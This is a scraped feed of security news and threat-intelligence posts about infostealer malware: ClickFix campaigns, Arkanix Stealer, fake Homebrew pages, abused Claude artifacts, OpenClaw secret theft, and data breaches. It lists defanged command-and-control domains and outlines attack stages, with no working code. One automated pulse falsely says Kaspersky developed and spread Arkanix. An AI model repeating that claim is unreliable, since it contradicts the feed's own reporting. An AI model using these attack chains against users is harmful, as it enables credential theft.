#BingAI promoted fake #OpenClaw #GitHub repo pushing info-stealing #malware

https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/

#Bing #Microsoft #AI #infostealer

Command-and-control domain tree, 2026-02-19 to 2026-03-04 #InfoStealer
https://abjuri5t.github.io/SarlackLab/

*.suncrest[.]in[.]net
*.agenciadelivearte[.]com[.]br

Lieferketten-Wurm 🪱 mit eigenem #MCP-Server verbreitet sich über #GitHub | Developer https://www.heise.de/news/Lieferketten-Wurm-mit-eigenem-MCP-Server-verbreitet-sich-ueber-GitHub-11190554.html #git :git: #ShaiHulud #malware #InfoStealer

#screenshot rubato da #infostealer

@sicurezza

"Adoro l'odore degli #screenshot rubati dagli #infostealer al mattino" cit.

@sicurezza

#ArkanixStealer pops up as short-lived #AI #infostealer experiment

https://www.bleepingcomputer.com/news/security/arkanix-stealer-pops-up-as-short-lived-ai-info-stealer-experiment/

#cybersecurity #Arkanix

Hello everyone! It's been a slightly quieter 24 hours in the cyber world, but we still have some interesting developments to cover, including a peek into AI-assisted malware development and a significant data privacy gaffe. Let's dive in:

AI-Assisted Info-Stealer Experiment: Arkanix Stealer 🤖

- A new information-stealing malware, Arkanix Stealer, was promoted on dark web forums for a brief period in late 2025 before its author abruptly took it down.
- Kaspersky researchers found strong indicators of Large Language Model (LLM) involvement in its development, suggesting an experiment to rapidly build and deploy malware, potentially reducing development time and costs.
- Arkanix offered extensive data-stealing capabilities, targeting browser data, cryptocurrency wallets, VPN credentials, and gaming platforms, with a premium C++ version adding advanced features like the ChromElevator post-exploitation tool.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/arkanix-stealer-pops-up-as-short-lived-ai-info-stealer-experiment/

Cornwall Council's Data Breach Blunder ⚠️

- Cornwall Council in the UK is facing a data breach claim after allegedly exposing the personal details of ten complainants to the subject of their complaints, Cllr Dulcie Tudor.
- Despite four individuals requesting redaction, the council's process failed, with Cllr Tudor gaining access to names, home addresses, email addresses, and phone numbers simply by opening the attached complaint files.
- This incident highlights critical flaws in the council's data handling procedures and raises concerns about compliance with data protection regulations, prompting an immediate review of how sensitive information is processed and shared.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/22/cornwall_council_complaints_breach/

#CyberSecurity #ThreatIntelligence #Malware #InfoStealer #AI #LLM #DataPrivacy #DataBreach #GDPR #InfoSec #CyberNews

Arkanix Stealer Targets Browsers via Dual Implementation

Arkanix Stealer is a MaaS infostealer with both C++ and Python implementations.

Pulse ID: 699b559757b9fda783b4d450
Pulse Link: https://otx.alienvault.com/pulse/699b559757b9fda783b4d450
Pulse Author: cryptocti
Created: 2026-02-22 19:14:31

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #InfoSec #InfoStealer #MaaS #OTX #OpenThreatExchange #Python #bot #cryptocti

CharlieKirk Credential Theft Malware Targeting Windows

CharlieKirk Grabber is a Python-based Windows infostealer that rapidly steals browser credentials

Pulse ID: 699a25c4c3fd0bde93c72263
Pulse Link: https://otx.alienvault.com/pulse/699a25c4c3fd0bde93c72263
Pulse Author: cryptocti
Created: 2026-02-21 21:38:12

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #InfoSec #InfoStealer #Malware #OTX #OpenThreatExchange #Python #Windows #bot #cryptocti

📢⚠️ New ClickFix attack uses fake CAPTCHA pages to trick users into running PowerShell malware. The infostealer targets crypto wallets, 25+ browsers, gaming accounts, and VPN data.

Read: https://hackread.com/clickfix-attack-crypto-wallets-browsers-infostealer/

#CyberSecurity #Malware #Infostealer #ClickFix #Captcha

Fake Homebrew Pages Deliver Cuckoo Stealer via ClickFix | macOS Threat Hunting Analysis

A sophisticated malware campaign targeting macOS users has been discovered, utilizing typosquatted domains impersonating the Homebrew package manager. The attack, dubbed ClickFix, exploits users' trust in command-line installation processes. Victims are tricked into executing malicious curl commands, leading to the deployment of a credential harvester and the Cuckoo Stealer malware. This infostealer establishes persistence through LaunchAgents, bypasses Gatekeeper, and employs encrypted C2 communication. It systematically exfiltrates sensitive data including browser credentials, cryptocurrency wallets, and system information. The campaign's infrastructure spans multiple domains hosted on shared IP addresses, indicating a coordinated and evolving threat.

Pulse ID: 69972ba35a28ae9de06a7308
Pulse Link: https://otx.alienvault.com/pulse/69972ba35a28ae9de06a7308
Pulse Author: AlienVault
Created: 2026-02-19 15:26:27

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #InfoSec #InfoStealer #Mac #MacOS #Malware #OTX #OpenThreatExchange #RAT #Rust #bot #cryptocurrency #AlienVault

Arkanix Stealer: a C++ & Python infostealer

A C++ and Python infostealer, dubbed Arkanix, has been developed and used by Kaspersky, a leading security firm, to spread and steal data from organisations across the globe.

Pulse ID: 6996f650827c9b89d94e32af
Pulse Link: https://otx.alienvault.com/pulse/6996f650827c9b89d94e32af
Pulse Author: CyberHunter_NL
Created: 2026-02-19 11:38:56

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #InfoStealer #Kaspersky #OTX #OpenThreatExchange #Python #bot #CyberHunter_NL

📢⚠️ Infostealer malware now targeting AI identity and memory files, researchers find #OpenClaw data theft exposing a user’s digital blueprint.

Read: https://hackread.com/infostealer-steal-openclaw-ai-identity-memory-files/

#CyberSecurity #Malware #Infostealer #Malware #AI

#Infostealer #malware found stealing #OpenClaw secrets for first time

https://www.bleepingcomputer.com/news/security/infostealer-malware-found-stealing-openclaw-secrets-for-first-time/

#AI #cybersecurity

📬 Hackers Are Literally Mailing You Scam Letters 📬

Threat actors are sending physical letters through postal mail pretending to be from Trezor and Ledger, manufacturers of cryptocurrency hardware wallets. The letters use official-looking branding and urgent language to trick recipients into revealing their wallet recovery phrases on fake websites. The scam represents a sophisticated blend of physical and digital social engineering.

Sources:
• https://www.bleepingcomputer.com/news/security/snail-mail-letters-target-trezor-and-ledger-users-in-crypto-theft-attacks/
• https://www.cryptotimes.io/2026/02/16/ledger-and-trezor-users-are-being-tricked-into-giving-away-millions/
• https://crypto.news/crypto-hackers-target-trezor-ledger-users-in-theft/
• https://phemex.com/news/article/scammers-target-ledger-and-trezor-users-with-phishing-letters-60803

#Cryptocurrency #Trezor #Ledger #PhishingScam #HardwareWallet
----------

🤖 Trusted AI Tool Weaponized to Hack Macs 🤖

Threat actors are abusing Claude AI's Artifacts feature and Google Ads in ClickFix campaigns that deliver infostealer malware to macOS users. The attacks target users searching for specific technical queries, showing malicious Google Ads that lead to Claude-generated artifacts containing malware. This represents a concerning abuse of AI-generated content for malware distribution.

Sources:
• https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/
• https://cyberpress.org/malicious-campaign-uses-claude-artifacts-and-google-ads/
• https://www.rescana.com/post/claude-llm-artifacts-exploited-to-distribute-mac-infostealer-malware-via-clickfix-attack-chain-targe
• https://www.news4hackers.com/clickfix-attack-exploits-claude-llm-artifacts-to-distribute-mac-infostealers/

#Claude #MacMalware #Infostealer #GoogleAds #AI
----------

❄️ ShinyHunters Strikes Again: 600K Records Leaked ❄️

The notorious ShinyHunters data extortion group claims to have stolen more than 600,000 Canada Goose customer records containing personal and payment-related information. Canada Goose told BleepingComputer the dataset appears to relate to past customer transactions and investigators have not found evidence of a breach of Canada Goose's own systems. The company is investigating whether the data came from a third-party vendor or partner.

Sources:
• https://www.bleepingcomputer.com/news/security/canada-goose-investigating-as-hackers-leak-600k-customer-records/
• https://securityaffairs.com/188046/data-breach/shinyhunters-leaked-600k-canada-goose-customer-records-but-the-firm-denies-it-was-breached.html
• https://www.techradar.com/pro/security/canada-goose-confirms-data-leak-around-600-000-customers-thought-to-be-affected
• https://vpncentral.com/canada-goose-600k-customer-records-leaked-shinyhunters-claims-third-party-breach/

#DataBreach #CanadaGoose #ShinyHunters #CustomerData #CyberSecurity

Infostealers now targeting AI agents.
OpenClaw configs exfiltrated:
• Gateway tokens
• Private keys
• “Soul” files
• Memory logs

Result: full AI identity compromise.
https://www.technadu.com/infostealer-evolves-to-target-ai-agents-openclaw-configurations/620246/

Are AI configs your new high-value assets?

#AI #Infostealer #InfoSec

Infostealers now targeting AI agents.

OpenClaw configs exfiltrated:
• Gateway tokens
• Private keys
• “Soul” files
• Memory logs

Result: full AI identity compromise.
https://www.technadu.com/infostealer-evolves-to-target-ai-agents-openclaw-configurations/620246/

Are AI configs your new high-value assets?

#AI #Infostealer #InfoSec

Claude Artifacts to abused to MacSync Infostealer in in ClickFix

Attackers abusedpublicClaude artifacts andpromoted themthrough
GoogleAdstomakemalicious linksappear legitimateinsearchresults

Pulse ID: 69905ba50237cf43b0cadc4c
Pulse Link: https://otx.alienvault.com/pulse/69905ba50237cf43b0cadc4c
Pulse Author: cryptocti
Created: 2026-02-14 11:25:25

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #Google #InfoSec #InfoStealer #Mac #OTX #OpenThreatExchange #bot #cryptocti

ClickFix campaigns are now leveraging LLM-generated public artifacts for malware distribution.

Per Moonlock Lab and AdGuard:
• Abuse of Claude artifact pages
• Google Ads search poisoning
• Obfuscated shell execution (base64 decode → zsh)
• Second-stage loader for MacSync infostealer
• Hardcoded API key + token-protected C2
• AppleScript (osascript) handling data theft
• Archive staging at /tmp/osalogging.zip
• Multi-attempt POST exfiltration

Previous campaigns exploited ChatGPT and Grok sharing features.
LLM trust is now an operational risk vector.
Should EDR flag suspicious AI-guided shell patterns?

Source: https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/

Engage below.
Follow @technadu for deep technical threat analysis.

#ThreatIntel #MacOSSecurity #Infostealer #C2Traffic #ClickFix #LLMSecurity #MalwareAnalysis #AppSec #BlueTeam #EDR #ThreatHunting #CyberThreats #ZeroTrust

Once-hobbled Lumma Stealer is back with lures that are hard to resist https://arstechni.ca/9U5H #castleloader #infostealer #Security #clickfix #malware #Biz&IT #lumma